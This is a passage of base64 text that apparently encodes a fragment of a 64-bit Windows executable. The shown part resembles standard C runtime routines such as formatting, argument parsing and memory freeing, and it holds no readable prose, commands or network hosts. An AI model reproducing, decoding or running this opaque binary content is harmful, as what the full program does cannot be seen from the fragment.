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i4AAAADofDn//0iLi4gAAADocDn//0iLi5AAAADoZDn//0iLi5gAAADoWDn//0iLi6AAAADoTDn//0iLi6gAAADoQDn//0iLi7AAAADoNDn//0iLi7gAAADoKDn//0iLi8AAAADoHDn//0iLi8gAAADoEDn//0iLi9AAAADoBDn//0iLi9gAAADo+Dj//0iLi+AAAADo7Dj//0iLi+gAAADo4Dj//0iLi/AAAADo1Dj//0iLi/gAAADoyDj//0iLiwABAADovDj//0iLiwgBAADosDj//0iLixABAADopDj//0iLixgBAADomDj//0iLiyABAADojDj//0iLiygBAADogDj//0iLizABAADodDj//0iLizgBAADoaDj//0iLi0ABAADoXDj//0iLi0gBAADoUDj//0iLi1ABAADoRDj//0iLi2gBAADoODj//0iLi3ABAADoLDj//0iLi3gBAADoIDj//0iLi4ABAADoFDj//0iLi4gBAADoCDj//0iLi5ABAADo/Df//0iLi2ABAADo8Df//0iLi6ABAADo5Df//0iLi6gBAADo2Df//0iLi7ABAADozDf//0iLi7gBAADowDf//0iLi8ABAADotDf//0iLi8gBAADoqDf//0iLi5gBAADonDf//0iLi9ABAADokDf//0iLi9gBAADohDf//0iLi+ABAADoeDf//0iLi+gBAADobDf//0iLi/ABAADoYDf//0iLi/gBAADoVDf//0iLiwACAADoSDf//0iLiwgCAADoPDf//0iLixACAADoMDf//0iLixgCAADoJDf//0iLiyACAADoGDf//0iLiygCAADoDDf//0iLizACAADoADf//0iLizgCAADo9Db//0iLi0ACAADo6Db//0iLi0gCAADo3Db//0iLi1ACAADo0Db//0iLi1gCAADoxDb//0iLi2ACAADouDb//0iLi2gCAADorDb//0iLi3ACAADooDb//0iLi3gCAADolDb//0iLi4ACAADoiDb//0iLi4gCAADofDb//0iLi5ACAADocDb//0iLi5gCAADoZDb//0iLi6ACAADoWDb//0iLi6gCAADoTDb//0iLi7ACAADoQDb//0iLi7gCAADoNDb//0iDxCBbw8zMQFVBVEFVQVZBV0iD7FBIjWwkQEiJXUBIiXVISIl9UEiLBT7ZAwBIM8VI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